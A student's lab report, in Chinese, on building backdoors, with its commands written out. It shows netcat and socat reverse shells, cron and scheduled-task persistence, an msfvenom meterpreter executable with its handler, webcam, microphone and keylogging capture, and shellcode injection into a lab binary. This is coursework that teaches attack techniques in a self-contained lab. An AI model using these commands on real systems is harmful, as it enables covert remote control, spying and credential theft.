20201326_exp2_后门原理与实践_实验报告
20201326 EXP2-后门原理与实践
一、实验基础
实验目的
本次实验需要我们掌握后门的基础知识,学习使用
nc实现Windows,Linux之间的后门连接,学习使用Metaspolit的msfvenom指令生成简单的后门程序,学会MSF POST模块的应用。
基础知识
- 后门
后门就是不经过正常认证流程而访问系统的通道。后门可能出现在编译器中、操作系统中,最常见的是应用程序中的后门,还可能是潜伏于操作系统中或伪装成特定应用的专用后门程序
- 后门常用工具
-
Ncat(NC、Netcat)
底层工具,进行基本的TCP、UDP数据收发,常常被与其他工具结合使用,起到后门的作用。- Linux系统中一般自带netcat,man nc查看帮助
- windows需要下载,解压即用
-
Socat
- 相当于超级netcat工具,linux自带
- Win端下载,解压即用。
-
Meterpreter
用来生成后门的工具
- 功能
- 基本功能(基本连接、执行指令)
- 拓展功能(搜集用户信息、安装服务)
- 编码模式
- 运行平台
- 运行参数
- 功能
-
常见Meterpreter工具
- intersect
- Metasploit的msfvenom的指令
- Veil-evasion
本次实验,我们使用msfvenom
-
实验目标
- 使用netcat获取主机操作Shell,cron启动
- 使用socat获取主机操作Shell,任务计划启动
- 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
- 使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
- 使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。
实验环境
- 主机:Win10
- 靶机:kali 2022.4
准备
win+r输入cmd打开命令行,使用ipconfig查看
IP:172.16.219.178
ctrl+alt+t打开终端,sudo ifconfig查看kali的IP:192.168.92.130
注:由于连接网络不同,主机的IP也会跟着改变,虚拟机一般不变。
二、实验内容
实验开始前,你需要关闭你的主机杀毒软件,如火绒,还有注意防火墙提示,需要允许应用通过防火墙才能完成实验。另外建议使用虚拟机上的Win10系统做实验,因为这样更安全。
1.使用netcat获取主机操作Shell,启动cron
1.Win获取Linux的Shell
进入ncat解压的文件夹目录(进入方法自行百度),在主机使用命令ncat -l -p 1326(个人学号后四位),监听1326号端口
在虚拟机终端执行命令nc 172.16.219.178(主机IP) 1326 -e /bin/sh
成功获得靶机的shell
2.Linux端获取Win端的Shell
在虚拟机终端执行nc -l -p 1326,监听1326号端口。在主机端执行ncat -e cmd 192.168.92.130 1326。下图成功获取win端的shell
3.在虚拟机中启动cron并在主机监听
先在虚拟机上用crontab -e指令编辑一条定时任务(crontab指令增加一条定时任务,-e表示编辑,输入2表示选择vim编辑器)在最后一行添加5 * * * * nc 172.16.219.178 1326 -e /bin/sh,在每个小时的第5分钟反向连接Windows主机的1326端口。vim使用技巧
在每小时的第5分中之前打开ncat,在ip地址为172.16.219.178的主机端用ncat -l -p 1326打开监听即可。图中时间为15:05
2、使用Socat获取主机Shell,任务计划启动
1.在Win端获取Linux的Shell
Win+r,输入compmgmt.msc打开计算机管理,选择任务计划程序、在选择创建任务。
设置任务名称
新建触发器
新建操作
添加参数为:
tcp-listen:1326 exec:cmd.exe,pty,stderr,作用是把cmd.exe绑定到端口1326,同时把cmd.exe的stderr重定向
Win+l锁定计算机,当你重新打开计算机它会自动运行socat.exe。这里做过一次了,所以防火墙没有报警,如果你的防火墙报警了,请允许它,因为这样才能继续。
在kali终端执行socat - tcp:172.16.219.178:1326
成功获取Win的shell
3.使用MSF meterpreter生成可执行文件,利用ncat(或者socat)传送到主机并运行获得主机的Shell
1.在kali生成20201326_bakcdoor.exe
执行命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.219.178 LPORT=1326 -f exe > 20201326_backdoor.exe,其中
· LHOST为反弹回连的IP,在这里是要反弹给Kali,也就是Kali的IP
· LPORT是回连的端口
· -p 使用的payload。
· payload翻译为有效载荷,就是被运输有东西。这里windows/meterpreter/reverse_tcp就是一段shellcode。
· -f 生成文件的类型
· > 输出到哪个文件
在Win端监听,执行 ncat -lv 1326 > 20201326_backdoor.exe
在Kali终端执行nc 172.16.219.178 1326 < 20201326_backdoor.exe
结果如下
2.在kali终端使用msfconsole指令进入msf控制台
对控制台进行配置
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 172.16.219.178
set LPORT 1326
查看配置信息
接着输入exploit进行监听,在Windows在打开20201326_backdoor.exe
4.使用MSF meterpreter生成获取主机音频、摄像头、击键等内容并且尝试提权
需要注意的是这一步需要在3的基础之上使用
1.获取目标主机音频
-
在kali终端输入
record_mic指令进行录音,-d设置时长 -
输入
webcam_snap指令控制摄像头拍照(这是自拍)
-
输入
run webcam进行屏幕录制 -
使用
screenshot指令进行截屏(图中显示的文件中包含了上述所有命令执行的结果)
- 输入
keyscan_start开始捕获键盘记录,keyscan_dump获取击键记录(-d设置时长)
5.使用MSF生成shellcode,注入实验一中的pwn1,反弹连接获取shell
1.关闭地址随机化、允许栈执行
2.在终端上输入指令msfvenom -p linux/x86/shell/reverse_tcp LHOST=192.168.92.130 LPORT=1326 -f c生成shellcode,如下截图IP设置出错
3.寻找返回地址
4.构造input_shellcode文件、获取shell成功
基础问题回答
-
例举你能想到的一个后门进入到你系统中的可能方式?
下载盗版软件、破解版软件后使用;在浏览网页是被诱导点击某些链接下载并安装某些软件。这都可能会被植入后门 -
例举你知道的后门如何启动起来(win及linux)的方式?
Linux socat和netcat获取shell、反弹连接等 windows 注册列表自启动、用户登录、定时任务、WMI、webshell、自启动服务等 -
Meterpreter有哪些给你印象深刻的功能?
meterpreter是一个很强大的黑客工具,能够轻易的生成攻击软件、完成攻击操作。我感觉有了这个软件可以干很多坏事。淡然这是不好的。 -
如何发现自己有系统有没有被安装后门?
· 经常死机 · 系统无法启动 · 某些文件打不开 · 经常报告内存不够 · 提示硬盘空间不够 · 出现大量来历不明的文件 · 启动黑屏/蓝屏 · 数据丢失 · 系统运行速度慢 · 系统自动执行操作 · 硬件设备在不允许的情况下调用
实验心得
以前认为黑客技术是非常高大尚的,需要顶尖高手才能掌握这些技术。但是这一次实验让我的想法发生了巨大的转变,原来这种后门技术可以这么简单。比如实验中获取摄像头权限、录屏幕、获取击键信息等;这是平时很难做到的操作,但是在工具的帮助下,这次实验中我也做到了,工具对人的生产活动有重要作用,提高了生产效率,如果没有那样的工具,要完成那样的攻击,就需要相当多的基础知识,完成相当多的操作。
在为这些技术惊叹的同时,也感到了一丝丝担忧。既然后门对于一个稍微有技术的人来说,能够这么轻易的完成,那么日常生活中的那些软件之中,会不会也存在这样的问题。在实验中获取电脑计摄像头权限时,心里猛然一惊,原来自己的隐私这么容易泄露。
我联想到中国银行app中你输入密码的时候,出现的就是app内置的键盘,这在一定程度上应该是可以避免击键信息被坏人获取。那么这样的话,那些输入法软件只要简单的收集击键数据,就能够获取一个人的很多信息,这样人们的信息安全就受到了很大的威胁了啊!
科技在进步发展,我们的信息却在裸奔。
